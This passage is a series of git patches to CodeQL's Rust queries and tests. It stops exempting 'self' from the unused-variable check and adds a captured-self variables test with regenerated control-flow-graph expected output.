a/rust/ql/test/query-tests/unusedentities/main.rs b/rust/ql/test/query-tests/unusedentities/main.rs index bd4bc4d23e1..cc64f47986b 100644 --- a/rust/ql/test/query-tests/unusedentities/main.rs +++ b/rust/ql/test/query-tests/unusedentities/main.rs @@ -85,6 +85,10 @@ impl MyStruct { fn my_get(&mut self) -> i64 { return self.val; } + + fn get_flags(&self) -> i64 { // $ SPURIOUS: Alert[rust/unused-variable] + return 0; + } } fn structs() { From 281f8b1828eafc07a8014d2a307900d9599b853b Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 12:29:07 +0000 Subject: [PATCH 0866/1267] Rust: Fix the unwanted results. --- rust/ql/src/queries/unusedentities/UnusedVariable.qll | 3 +++ .../ql/test/query-tests/unusedentities/UnusedVariable.expected | 1 - rust/ql/test/query-tests/unusedentities/main.rs | 2 +- 3 files changed, 4 insertions(+), 2 deletions(-) diff --git a/rust/ql/src/queries/unusedentities/UnusedVariable.qll b/rust/ql/src/queries/unusedentities/UnusedVariable.qll index d92f8787af1..38f09d0a500 100644 --- a/rust/ql/src/queries/unusedentities/UnusedVariable.qll +++ b/rust/ql/src/queries/unusedentities/UnusedVariable.qll @@ -23,4 +23,7 @@ predicate isUnused(Variable v) { predicate isAllowableUnused(Variable v) { // in a macro expansion v.getPat().isInMacroExpansion() + or + // a 'self' variable + v.getName() = "self" } diff --git a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected index 302810e08e5..203824f4a4b 100644 --- a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected +++ b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected @@ -1,5 +1,4 @@ | main.rs:29:9:29:9 | a | Variable 'a' is not used. | -| main.rs:89:19:89:22 | self | Variable 'self' is not used. | | main.rs:98:13:98:13 | d | Variable 'd' is not used. | | main.rs:147:5:147:5 | y | Variable 'y' is not used. | | main.rs:174:9:174:9 | x | Variable 'x' is not used. | diff --git a/rust/ql/test/query-tests/unusedentities/main.rs b/rust/ql/test/query-tests/unusedentities/main.rs index cc64f47986b..2f729690f92 100644 --- a/rust/ql/test/query-tests/unusedentities/main.rs +++ b/rust/ql/test/query-tests/unusedentities/main.rs @@ -86,7 +86,7 @@ impl MyStruct { return self.val; } - fn get_flags(&self) -> i64 { // $ SPURIOUS: Alert[rust/unused-variable] + fn get_flags(&self) -> i64 { return 0; } } From 43dd3ebf14c187ad5aad5b6d9d1fe225eac896bf Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 6 Dec 2024 14:07:42 +0100 Subject: [PATCH 0867/1267] Rust: Add variables test with captured self parameter --- .../test/library-tests/variables/Cfg.expected | 480 +++++++++--------- .../test/library-tests/variables/Ssa.expected | 58 ++- .../variables/variables.expected | 76 +-- .../test/library-tests/variables/variables.rs | 9 + 4 files changed, 342 insertions(+), 281 deletions(-) diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index 673f57d5e68..0763f7a4e4b 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected @@ -1084,235 +1084,261 @@ edges | variables.rs:486:11:486:14 | self | variables.rs:486:11:486:14 | SelfParam | | | variables.rs:486:25:488:5 | { ... } | variables.rs:486:5:488:5 | exit fn id (normal) | | | variables.rs:487:9:487:12 | self | variables.rs:486:25:488:5 | { ... } | | -| variables.rs:491:1:498:1 | enter fn structs | variables.rs:492:5:492:36 | let ... = ... | | -| variables.rs:491:1:498:1 | exit fn structs (normal) | variables.rs:491:1:498:1 | exit fn structs | | -| variables.rs:491:14:498:1 | { ... } | variables.rs:491:1:498:1 | exit fn structs (normal) | | -| variables.rs:492:5:492:36 | let ... = ... | variables.rs:492:33:492:33 | 1 | | -| variables.rs:492:9:492:13 | a | variables.rs:493:5:493:26 | ExprStmt | match | -| variables.rs:492:17:492:35 | MyStruct {...} | variables.rs:492:9:492:13 | a | | -| variables.rs:492:33:492:33 | 1 | variables.rs:492:17:492:35 | MyStruct {...} | | -| variables.rs:493:5:493:13 | print_i64 | variables.rs:493:15:493:15 | a | | -| variables.rs:493:5:493:25 | print_i64(...) | variables.rs:494:5:494:14 | ExprStmt | | -| variables.rs:493:5:493:26 | ExprStmt | variables.rs:493:5:493:13 | print_i64 | | -| variables.rs:493:15:493:15 | a | variables.rs:493:15:493:24 | a.my_get(...) | | -| variables.rs:493:15:493:24 | a.my_get(...) | variables.rs:493:5:493:25 | print_i64(...) | | -| variables.rs:494:5:494:5 | a | variables.rs:494:5:494:9 | a.val | | -| variables.rs:494:5:494:9 | a.val | variables.rs:494:13:494:13 | 5 | | -| variables.rs:494:5:494:13 | ... = ... | variables.rs:495:5:495:26 | ExprStmt | | -| variables.rs:494:5:494:14 | ExprStmt | variables.rs:494:5:494:5 | a | | -| variables.rs:494:13:494:13 | 5 | variables.rs:494:5:494:13 | ... = ... | | -| variables.rs:495:5:495:13 | print_i64 | variables.rs:495:15:495:15 | a | | -| variables.rs:495:5:495:25 | print_i64(...) | variables.rs:496:5:496:28 | ExprStmt | | -| variables.rs:495:5:495:26 | ExprStmt | variables.rs:495:5:495:13 | print_i64 | | -| variables.rs:495:15:495:15 | a | variables.rs:495:15:495:24 | a.my_get(...) | | -| variables.rs:495:15:495:24 | a.my_get(...) | variables.rs:495:5:495:25 | print_i64(...) | | -| variables.rs:496:5:496:5 | a | variables.rs:496:25:496:25 | 2 | | -| variables.rs:496:5:496:27 | ... = ... | variables.rs:497:5:497:26 | ExprStmt | | -| variables.rs:496:5:496:28 | ExprStmt | variables.rs:496:5:496:5 | a | | -| variables.rs:496:9:496:27 | MyStruct {...} | variables.rs:496:5:496:27 | ... = ... | | -| variables.rs:496:25:496:25 | 2 | variables.rs:496:9:496:27 | MyStruct {...} | | -| variables.rs:497:5:497:13 | print_i64 | variables.rs:497:15:497:15 | a | | -| variables.rs:497:5:497:25 | print_i64(...) | variables.rs:491:14:498:1 | { ... } | | -| variables.rs:497:5:497:26 | ExprStmt | variables.rs:497:5:497:13 | print_i64 | | -| variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | a.my_get(...) | | -| variables.rs:497:15:497:24 | a.my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | -| variables.rs:500:1:507:1 | enter fn arrays | variables.rs:501:5:501:26 | let ... = ... | | -| variables.rs:500:1:507:1 | exit fn arrays (normal) | variables.rs:500:1:507:1 | exit fn arrays | | -| variables.rs:500:13:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn arrays (normal) | | -| variables.rs:501:5:501:26 | let ... = ... | variables.rs:501:18:501:18 | 1 | | -| variables.rs:501:9:501:13 | a | variables.rs:502:5:502:20 | ExprStmt | match | -| variables.rs:501:17:501:25 | [...] | variables.rs:501:9:501:13 | a | | -| variables.rs:501:18:501:18 | 1 | variables.rs:501:21:501:21 | 2 | | -| variables.rs:501:21:501:21 | 2 | variables.rs:501:24:501:24 | 3 | | -| variables.rs:501:24:501:24 | 3 | variables.rs:501:17:501:25 | [...] | | +| variables.rs:490:5:497:5 | enter fn my_method | variables.rs:490:23:490:26 | self | | +| variables.rs:490:5:497:5 | exit fn my_method (normal) | variables.rs:490:5:497:5 | exit fn my_method | | +| variables.rs:490:18:490:26 | SelfParam | variables.rs:491:9:494:10 | let ... = ... | | +| variables.rs:490:23:490:26 | self | variables.rs:490:18:490:26 | SelfParam | | +| variables.rs:490:29:497:5 | { ... } | variables.rs:490:5:497:5 | exit fn my_method (normal) | | +| variables.rs:491:9:494:10 | let ... = ... | variables.rs:491:21:494:9 | \|...\| ... | | +| variables.rs:491:13:491:17 | f | variables.rs:495:9:495:13 | ExprStmt | match | +| variables.rs:491:21:494:9 | \|...\| ... | variables.rs:491:13:491:17 | f | | +| variables.rs:491:21:494:9 | enter \|...\| ... | variables.rs:491:22:491:22 | n | | +| variables.rs:491:21:494:9 | exit \|...\| ... (normal) | variables.rs:491:21:494:9 | exit \|...\| ... | | +| variables.rs:491:22:491:22 | ... | variables.rs:493:13:493:26 | ExprStmt | | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | ... | match | +| variables.rs:491:25:494:9 | { ... } | variables.rs:491:21:494:9 | exit \|...\| ... (normal) | | +| variables.rs:493:13:493:16 | self | variables.rs:493:13:493:20 | self.val | | +| variables.rs:493:13:493:20 | self.val | variables.rs:493:25:493:25 | n | | +| variables.rs:493:13:493:25 | ... += ... | variables.rs:491:25:494:9 | { ... } | | +| variables.rs:493:13:493:26 | ExprStmt | variables.rs:493:13:493:16 | self | | +| variables.rs:493:25:493:25 | n | variables.rs:493:13:493:25 | ... += ... | | +| variables.rs:495:9:495:9 | f | variables.rs:495:11:495:11 | 3 | | +| variables.rs:495:9:495:12 | f(...) | variables.rs:496:9:496:13 | ExprStmt | | +| variables.rs:495:9:495:13 | ExprStmt | variables.rs:495:9:495:9 | f | | +| variables.rs:495:11:495:11 | 3 | variables.rs:495:9:495:12 | f(...) | | +| variables.rs:496:9:496:9 | f | variables.rs:496:11:496:11 | 4 | | +| variables.rs:496:9:496:12 | f(...) | variables.rs:490:29:497:5 | { ... } | | +| variables.rs:496:9:496:13 | ExprStmt | variables.rs:496:9:496:9 | f | | +| variables.rs:496:11:496:11 | 4 | variables.rs:496:9:496:12 | f(...) | | +| variables.rs:500:1:507:1 | enter fn structs | variables.rs:501:5:501:36 | let ... = ... | | +| variables.rs:500:1:507:1 | exit fn structs (normal) | variables.rs:500:1:507:1 | exit fn structs | | +| variables.rs:500:14:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn structs (normal) | | +| variables.rs:501:5:501:36 | let ... = ... | variables.rs:501:33:501:33 | 1 | | +| variables.rs:501:9:501:13 | a | variables.rs:502:5:502:26 | ExprStmt | match | +| variables.rs:501:17:501:35 | MyStruct {...} | variables.rs:501:9:501:13 | a | | +| variables.rs:501:33:501:33 | 1 | variables.rs:501:17:501:35 | MyStruct {...} | | | variables.rs:502:5:502:13 | print_i64 | variables.rs:502:15:502:15 | a | | -| variables.rs:502:5:502:19 | print_i64(...) | variables.rs:503:5:503:13 | ExprStmt | | -| variables.rs:502:5:502:20 | ExprStmt | variables.rs:502:5:502:13 | print_i64 | | -| variables.rs:502:15:502:15 | a | variables.rs:502:17:502:17 | 0 | | -| variables.rs:502:15:502:18 | a[0] | variables.rs:502:5:502:19 | print_i64(...) | | -| variables.rs:502:17:502:17 | 0 | variables.rs:502:15:502:18 | a[0] | | -| variables.rs:503:5:503:5 | a | variables.rs:503:7:503:7 | 1 | | -| variables.rs:503:5:503:8 | a[1] | variables.rs:503:12:503:12 | 5 | | -| variables.rs:503:5:503:12 | ... = ... | variables.rs:504:5:504:20 | ExprStmt | | -| variables.rs:503:5:503:13 | ExprStmt | variables.rs:503:5:503:5 | a | | -| variables.rs:503:7:503:7 | 1 | variables.rs:503:5:503:8 | a[1] | | -| variables.rs:503:12:503:12 | 5 | variables.rs:503:5:503:12 | ... = ... | | +| variables.rs:502:5:502:25 | print_i64(...) | variables.rs:503:5:503:14 | ExprStmt | | +| variables.rs:502:5:502:26 | ExprStmt | variables.rs:502:5:502:13 | print_i64 | | +| variables.rs:502:15:502:15 | a | variables.rs:502:15:502:24 | a.my_get(...) | | +| variables.rs:502:15:502:24 | a.my_get(...) | variables.rs:502:5:502:25 | print_i64(...) | | +| variables.rs:503:5:503:5 | a | variables.rs:503:5:503:9 | a.val | | +| variables.rs:503:5:503:9 | a.val | variables.rs:503:13:503:13 | 5 | | +| variables.rs:503:5:503:13 | ... = ... | variables.rs:504:5:504:26 | ExprStmt | | +| variables.rs:503:5:503:14 | ExprStmt | variables.rs:503:5:503:5 | a | | +| variables.rs:503:13:503:13 | 5 | variables.rs:503:5:503:13 | ... = ... | | | variables.rs:504:5:504:13 | print_i64 | variables.rs:504:15:504:15 | a | | -| variables.rs:504:5:504:19 | print_i64(...) | variables.rs:505:5:505:18 | ExprStmt | | -| variables.rs:504:5:504:20 | ExprStmt | variables.rs:504:5:504:13 | print_i64 | | -| variables.rs:504:15:504:15 | a | variables.rs:504:17:504:17 | 1 | | -| variables.rs:504:15:504:18 | a[1] | variables.rs:504:5:504:19 | print_i64(...) | | -| variables.rs:504:17:504:17 | 1 | variables.rs:504:15:504:18 | a[1] | | -| variables.rs:505:5:505:5 | a | variables.rs:505:10:505:10 | 4 | | -| variables.rs:505:5:505:17 | ... = ... | variables.rs:506:5:506:20 | ExprStmt | | -| variables.rs:505:5:505:18 | ExprStmt | variables.rs:505:5:505:5 | a | | -| variables.rs:505:9:505:17 | [...] | variables.rs:505:5:505:17 | ... = ... | | -| variables.rs:505:10:505:10 | 4 | variables.rs:505:13:505:13 | 5 | | -| variables.rs:505:13:505:13 | 5 | variables.rs:505:16:505:16 | 6 | | -| variables.rs:505:16:505:16 | 6 | variables.rs:505:9:505:17 | [...] | | +| variables.rs:504:5:504:25 | print_i64(...) | variables.rs:505:5:505:28 | ExprStmt | | +| variables.rs:504:5:504:26 | ExprStmt | variables.rs:504:5:504:13 | print_i64 | | +| variables.rs:504:15:504:15 | a | variables.rs:504:15:504:24 | a.my_get(...) | | +| variables.rs:504:15:504:24 | a.my_get(...) | variables.rs:504:5:504:25 | print_i64(...) | | +| variables.rs:505:5:505:5 | a | variables.rs:505:25:505:25 | 2 | | +| variables.rs:505:5:505:27 | ... = ... | variables.rs:506:5:506:26 | ExprStmt | | +| variables.rs:505:5:505:28 | ExprStmt | variables.rs:505:5:505:5 | a | | +| variables.rs:505:9:505:27 | MyStruct {...} | variables.rs:505:5:505:27 | ... = ... | | +| variables.rs:505:25:505:25 | 2 | variables.rs:505:9:505:27 | MyStruct {...} | | | variables.rs:506:5:506:13 | print_i64 | variables.rs:506:15:506:15 | a | | -| variables.rs:506:5:506:19 | print_i64(...) | variables.rs:500:13:507:1 | { ... } | | -| variables.rs:506:5:506:20 | ExprStmt | variables.rs:506:5:506:13 | print_i64 | | -| variables.rs:506:15:506:15 | a | variables.rs:506:17:506:17 | 2 | | -| variables.rs:506:15:506:18 | a[2] | variables.rs:506:5:506:19 | print_i64(...) | | -| variables.rs:506:17:506:17 | 2 | variables.rs:506:15:506:18 | a[2] | | -| variables.rs:509:1:516:1 | enter fn ref_arg | variables.rs:510:5:510:15 | let ... = 16 | | -| variables.rs:509:1:516:1 | exit fn ref_arg (normal) | variables.rs:509:1:516:1 | exit fn ref_arg | | -| variables.rs:509:14:516:1 | { ... } | variables.rs:509:1:516:1 | exit fn ref_arg (normal) | | -| variables.rs:510:5:510:15 | let ... = 16 | variables.rs:510:13:510:14 | 16 | | -| variables.rs:510:9:510:9 | x | variables.rs:511:5:511:22 | ExprStmt | match | -| variables.rs:510:13:510:14 | 16 | variables.rs:510:9:510:9 | x | | -| variables.rs:511:5:511:17 | print_i64_ref | variables.rs:511:20:511:20 | x | | -| variables.rs:511:5:511:21 | print_i64_ref(...) | variables.rs:512:5:512:17 | ExprStmt | | -| variables.rs:511:5:511:22 | ExprStmt | variables.rs:511:5:511:17 | print_i64_ref | | -| variables.rs:511:19:511:20 | &x | variables.rs:511:5:511:21 | print_i64_ref(...) | | -| variables.rs:511:20:511:20 | x | variables.rs:511:19:511:20 | &x | | -| variables.rs:512:5:512:13 | print_i64 | variables.rs:512:15:512:15 | x | | -| variables.rs:512:5:512:16 | print_i64(...) | variables.rs:514:5:514:15 | let ... = 17 | | -| variables.rs:512:5:512:17 | ExprStmt | variables.rs:512:5:512:13 | print_i64 | | -| variables.rs:512:15:512:15 | x | variables.rs:512:5:512:16 | print_i64(...) | | -| variables.rs:514:5:514:15 | let ... = 17 | variables.rs:514:13:514:14 | 17 | | -| variables.rs:514:9:514:9 | z | variables.rs:515:5:515:22 | ExprStmt | match | -| variables.rs:514:13:514:14 | 17 | variables.rs:514:9:514:9 | z | | -| variables.rs:515:5:515:17 | print_i64_ref | variables.rs:515:20:515:20 | z | | -| variables.rs:515:5:515:21 | print_i64_ref(...) | variables.rs:509:14:516:1 | { ... } | | -| variables.rs:515:5:515:22 | ExprStmt | variables.rs:515:5:515:17 | print_i64_ref | | -| variables.rs:515:19:515:20 | &z | variables.rs:515:5:515:21 | print_i64_ref(...) | | -| variables.rs:515:20:515:20 | z | variables.rs:515:19:515:20 | &z | | -| variables.rs:523:3:525:3 | enter fn bar | variables.rs:523:15:523:18 | self | | -| variables.rs:523:3:525:3 | exit fn bar (normal) | variables.rs:523:3:525:3 | exit fn bar | | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:524:5:524:32 | ExprStmt | | -| variables.rs:523:15:523:18 | self | variables.rs:523:10:523:18 | SelfParam | | -| variables.rs:523:21:525:3 | { ... } | variables.rs:523:3:525:3 | exit fn bar (normal) | | -| variables.rs:524:5:524:9 | * ... | variables.rs:524:29:524:29 | 3 | | -| variables.rs:524:5:524:31 | ... = ... | variables.rs:523:21:525:3 | { ... } | | -| variables.rs:524:5:524:32 | ExprStmt | variables.rs:524:6:524:9 | self | | -| variables.rs:524:6:524:9 | self | variables.rs:524:5:524:9 | * ... | | -| variables.rs:524:13:524:31 | MyStruct {...} | variables.rs:524:5:524:31 | ... = ... | | -| variables.rs:524:29:524:29 | 3 | variables.rs:524:13:524:31 | MyStruct {...} | | -| variables.rs:528:1:533:1 | enter fn ref_methodcall_receiver | variables.rs:529:3:529:34 | let ... = ... | | -| variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver | | -| variables.rs:528:30:533:1 | { ... } | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | | -| variables.rs:529:3:529:34 | let ... = ... | variables.rs:529:31:529:31 | 1 | | -| variables.rs:529:7:529:11 | a | variables.rs:530:3:530:10 | ExprStmt | match | -| variables.rs:529:15:529:33 | MyStruct {...} | variables.rs:529:7:529:11 | a | | -| variables.rs:529:31:529:31 | 1 | variables.rs:529:15:529:33 | MyStruct {...} | | -| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | a.bar(...) | | -| variables.rs:530:3:530:9 | a.bar(...) | variables.rs:532:3:532:19 | ExprStmt | | -| variables.rs:530:3:530:10 | ExprStmt | variables.rs:530:3:530:3 | a | | -| variables.rs:532:3:532:11 | print_i64 | variables.rs:532:13:532:13 | a | | -| variables.rs:532:3:532:18 | print_i64(...) | variables.rs:528:30:533:1 | { ... } | | -| variables.rs:532:3:532:19 | ExprStmt | variables.rs:532:3:532:11 | print_i64 | | -| variables.rs:532:13:532:13 | a | variables.rs:532:13:532:17 | a.val | | -| variables.rs:532:13:532:17 | a.val | variables.rs:532:3:532:18 | print_i64(...) | | -| variables.rs:535:1:569:1 | enter fn main | variables.rs:536:5:536:25 | ExprStmt | | -| variables.rs:535:1:569:1 | exit fn main (normal) | variables.rs:535:1:569:1 | exit fn main | | -| variables.rs:535:11:569:1 | { ... } | variables.rs:535:1:569:1 | exit fn main (normal) | | -| variables.rs:536:5:536:22 | immutable_variable | variables.rs:536:5:536:24 | immutable_variable(...) | | -| variables.rs:536:5:536:24 | immutable_variable(...) | variables.rs:537:5:537:23 | ExprStmt | | -| variables.rs:536:5:536:25 | ExprStmt | variables.rs:536:5:536:22 | immutable_variable | | -| variables.rs:537:5:537:20 | mutable_variable | variables.rs:537:5:537:22 | mutable_variable(...) | | -| variables.rs:537:5:537:22 | mutable_variable(...) | variables.rs:538:5:538:40 | ExprStmt | | -| variables.rs:537:5:537:23 | ExprStmt | variables.rs:537:5:537:20 | mutable_variable | | -| variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | | -| variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | variables.rs:539:5:539:23 | ExprStmt | | -| variables.rs:538:5:538:40 | ExprStmt | variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | | -| variables.rs:539:5:539:20 | variable_shadow1 | variables.rs:539:5:539:22 | variable_shadow1(...) | | -| variables.rs:539:5:539:22 | variable_shadow1(...) | variables.rs:540:5:540:23 | ExprStmt | | -| variables.rs:539:5:539:23 | ExprStmt | variables.rs:539:5:539:20 | variable_shadow1 | | -| variables.rs:540:5:540:20 | variable_shadow2 | variables.rs:540:5:540:22 | variable_shadow2(...) | | -| variables.rs:540:5:540:22 | variable_shadow2(...) | variables.rs:541:5:541:19 | ExprStmt | | -| variables.rs:540:5:540:23 | ExprStmt | variables.rs:540:5:540:20 | variable_shadow2 | | -| variables.rs:541:5:541:16 | let_pattern1 | variables.rs:541:5:541:18 | let_pattern1(...) | | -| variables.rs:541:5:541:18 | let_pattern1(...) | variables.rs:542:5:542:19 | ExprStmt | | -| variables.rs:541:5:541:19 | ExprStmt | variables.rs:541:5:541:16 | let_pattern1 | | -| variables.rs:542:5:542:16 | let_pattern2 | variables.rs:542:5:542:18 | let_pattern2(...) | | -| variables.rs:542:5:542:18 | let_pattern2(...) | variables.rs:543:5:543:19 | ExprStmt | | -| variables.rs:542:5:542:19 | ExprStmt | variables.rs:542:5:542:16 | let_pattern2 | | -| variables.rs:543:5:543:16 | let_pattern3 | variables.rs:543:5:543:18 | let_pattern3(...) | | -| variables.rs:543:5:543:18 | let_pattern3(...) | variables.rs:544:5:544:19 | ExprStmt | | -| variables.rs:543:5:543:19 | ExprStmt | variables.rs:543:5:543:16 | let_pattern3 | | -| variables.rs:544:5:544:16 | let_pattern4 | variables.rs:544:5:544:18 | let_pattern4(...) | | -| variables.rs:544:5:544:18 | let_pattern4(...) | variables.rs:545:5:545:21 | ExprStmt | | -| variables.rs:544:5:544:19 | ExprStmt | variables.rs:544:5:544:16 | let_pattern4 | | -| variables.rs:545:5:545:18 | match_pattern1 | variables.rs:545:5:545:20 | match_pattern1(...) | | -| variables.rs:545:5:545:20 | match_pattern1(...) | variables.rs:546:5:546:21 | ExprStmt | | -| variables.rs:545:5:545:21 | ExprStmt | variables.rs:545:5:545:18 | match_pattern1 | | -| variables.rs:546:5:546:18 | match_pattern2 | variables.rs:546:5:546:20 | match_pattern2(...) | | -| variables.rs:546:5:546:20 | match_pattern2(...) | variables.rs:547:5:547:21 | ExprStmt | | -| variables.rs:546:5:546:21 | ExprStmt | variables.rs:546:5:546:18 | match_pattern2 | | -| variables.rs:547:5:547:18 | match_pattern3 | variables.rs:547:5:547:20 | match_pattern3(...) | | -| variables.rs:547:5:547:20 | match_pattern3(...) | variables.rs:548:5:548:21 | ExprStmt | | -| variables.rs:547:5:547:21 | ExprStmt | variables.rs:547:5:547:18 | match_pattern3 | | -| variables.rs:548:5:548:18 | match_pattern4 | variables.rs:548:5:548:20 | match_pattern4(...) | | -| variables.rs:548:5:548:20 | match_pattern4(...) | variables.rs:549:5:549:21 | ExprStmt | | -| variables.rs:548:5:548:21 | ExprStmt | variables.rs:548:5:548:18 | match_pattern4 | | -| variables.rs:549:5:549:18 | match_pattern5 | variables.rs:549:5:549:20 | match_pattern5(...) | | -| variables.rs:549:5:549:20 | match_pattern5(...) | variables.rs:550:5:550:21 | ExprStmt | | -| variables.rs:549:5:549:21 | ExprStmt | variables.rs:549:5:549:18 | match_pattern5 | | -| variables.rs:550:5:550:18 | match_pattern6 | variables.rs:550:5:550:20 | match_pattern6(...) | | -| variables.rs:550:5:550:20 | match_pattern6(...) | variables.rs:551:5:551:21 | ExprStmt | | -| variables.rs:550:5:550:21 | ExprStmt | variables.rs:550:5:550:18 | match_pattern6 | | -| variables.rs:551:5:551:18 | match_pattern7 | variables.rs:551:5:551:20 | match_pattern7(...) | | -| variables.rs:551:5:551:20 | match_pattern7(...) | variables.rs:552:5:552:21 | ExprStmt | | -| variables.rs:551:5:551:21 | ExprStmt | variables.rs:551:5:551:18 | match_pattern7 | | -| variables.rs:552:5:552:18 | match_pattern8 | variables.rs:552:5:552:20 | match_pattern8(...) | | -| variables.rs:552:5:552:20 | match_pattern8(...) | variables.rs:553:5:553:21 | ExprStmt | | -| variables.rs:552:5:552:21 | ExprStmt | variables.rs:552:5:552:18 | match_pattern8 | | -| variables.rs:553:5:553:18 | match_pattern9 | variables.rs:553:5:553:20 | match_pattern9(...) | | -| variables.rs:553:5:553:20 | match_pattern9(...) | variables.rs:554:5:554:36 | ExprStmt | | -| variables.rs:553:5:553:21 | ExprStmt | variables.rs:553:5:553:18 | match_pattern9 | | -| variables.rs:554:5:554:18 | param_pattern1 | variables.rs:554:20:554:22 | "a" | | -| variables.rs:554:5:554:35 | param_pattern1(...) | variables.rs:555:5:555:37 | ExprStmt | | -| variables.rs:554:5:554:36 | ExprStmt | variables.rs:554:5:554:18 | param_pattern1 | | -| variables.rs:554:20:554:22 | "a" | variables.rs:554:26:554:28 | "b" | | -| variables.rs:554:25:554:34 | TupleExpr | variables.rs:554:5:554:35 | param_pattern1(...) | | -| variables.rs:554:26:554:28 | "b" | variables.rs:554:31:554:33 | "c" | | -| variables.rs:554:31:554:33 | "c" | variables.rs:554:25:554:34 | TupleExpr | | -| variables.rs:555:5:555:18 | param_pattern2 | variables.rs:555:20:555:31 | ...::Left | | -| variables.rs:555:5:555:36 | param_pattern2(...) | variables.rs:556:5:556:26 | ExprStmt | | -| variables.rs:555:5:555:37 | ExprStmt | variables.rs:555:5:555:18 | param_pattern2 | | -| variables.rs:555:20:555:31 | ...::Left | variables.rs:555:33:555:34 | 45 | | -| variables.rs:555:20:555:35 | ...::Left(...) | variables.rs:555:5:555:36 | param_pattern2(...) | | -| variables.rs:555:33:555:34 | 45 | variables.rs:555:20:555:35 | ...::Left(...) | | -| variables.rs:556:5:556:23 | destruct_assignment | variables.rs:556:5:556:25 | destruct_assignment(...) | | -| variables.rs:556:5:556:25 | destruct_assignment(...) | variables.rs:557:5:557:23 | ExprStmt | | -| variables.rs:556:5:556:26 | ExprStmt | variables.rs:556:5:556:23 | destruct_assignment | | -| variables.rs:557:5:557:20 | closure_variable | variables.rs:557:5:557:22 | closure_variable(...) | | -| variables.rs:557:5:557:22 | closure_variable(...) | variables.rs:558:5:558:19 | ExprStmt | | -| variables.rs:557:5:557:23 | ExprStmt | variables.rs:557:5:557:20 | closure_variable | | -| variables.rs:558:5:558:16 | for_variable | variables.rs:558:5:558:18 | for_variable(...) | | -| variables.rs:558:5:558:18 | for_variable(...) | variables.rs:559:5:559:17 | ExprStmt | | -| variables.rs:558:5:558:19 | ExprStmt | variables.rs:558:5:558:16 | for_variable | | -| variables.rs:559:5:559:14 | add_assign | variables.rs:559:5:559:16 | add_assign(...) | | -| variables.rs:559:5:559:16 | add_assign(...) | variables.rs:560:5:560:13 | ExprStmt | | -| variables.rs:559:5:559:17 | ExprStmt | variables.rs:559:5:559:14 | add_assign | | -| variables.rs:560:5:560:10 | mutate | variables.rs:560:5:560:12 | mutate(...) | | -| variables.rs:560:5:560:12 | mutate(...) | variables.rs:561:5:561:17 | ExprStmt | | -| variables.rs:560:5:560:13 | ExprStmt | variables.rs:560:5:560:10 | mutate | | -| variables.rs:561:5:561:14 | mutate_arg | variables.rs:561:5:561:16 | mutate_arg(...) | | -| variables.rs:561:5:561:16 | mutate_arg(...) | variables.rs:562:5:562:12 | ExprStmt | | -| variables.rs:561:5:561:17 | ExprStmt | variables.rs:561:5:561:14 | mutate_arg | | -| variables.rs:562:5:562:9 | alias | variables.rs:562:5:562:11 | alias(...) | | -| variables.rs:562:5:562:11 | alias(...) | variables.rs:563:5:563:18 | ExprStmt | | -| variables.rs:562:5:562:12 | ExprStmt | variables.rs:562:5:562:9 | alias | | -| variables.rs:563:5:563:15 | capture_mut | variables.rs:563:5:563:17 | capture_mut(...) | | -| variables.rs:563:5:563:17 | capture_mut(...) | variables.rs:564:5:564:20 | ExprStmt | | -| variables.rs:563:5:563:18 | ExprStmt | variables.rs:563:5:563:15 | capture_mut | | -| variables.rs:564:5:564:17 | capture_immut | variables.rs:564:5:564:19 | capture_immut(...) | | -| variables.rs:564:5:564:19 | capture_immut(...) | variables.rs:565:5:565:26 | ExprStmt | | -| variables.rs:564:5:564:20 | ExprStmt | variables.rs:564:5:564:17 | capture_immut | | -| variables.rs:565:5:565:23 | async_block_capture | variables.rs:565:5:565:25 | async_block_capture(...) | | -| variables.rs:565:5:565:25 | async_block_capture(...) | variables.rs:566:5:566:14 | ExprStmt | | -| variables.rs:565:5:565:26 | ExprStmt | variables.rs:565:5:565:23 | async_block_capture | | -| variables.rs:566:5:566:11 | structs | variables.rs:566:5:566:13 | structs(...) | | -| variables.rs:566:5:566:13 | structs(...) | variables.rs:567:5:567:14 | ExprStmt | | -| variables.rs:566:5:566:14 | ExprStmt | variables.rs:566:5:566:11 | structs | | -| variables.rs:567:5:567:11 | ref_arg | variables.rs:567:5:567:13 | ref_arg(...) | | -| variables.rs:567:5:567:13 | ref_arg(...) | variables.rs:568:5:568:30 | ExprStmt | | -| variables.rs:567:5:567:14 | ExprStmt | variables.rs:567:5:567:11 | ref_arg | | -| variables.rs:568:5:568:27 | ref_methodcall_receiver | variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | | -| variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | variables.rs:535:11:569:1 | { ... } | | -| variables.rs:568:5:568:30 | ExprStmt | variables.rs:568:5:568:27 | ref_methodcall_receiver | | +| variables.rs:506:5:506:25 | print_i64(...) | variables.rs:500:14:507:1 | { ... } | | +| variables.rs:506:5:506:26 | ExprStmt | variables.rs:506:5:506:13 | print_i64 | | +| variables.rs:506:15:506:15 | a | variables.rs:506:15:506:24 | a.my_get(...) | | +| variables.rs:506:15:506:24 | a.my_get(...) | variables.rs:506:5:506:25 | print_i64(...) | | +| variables.rs:509:1:516:1 | enter fn 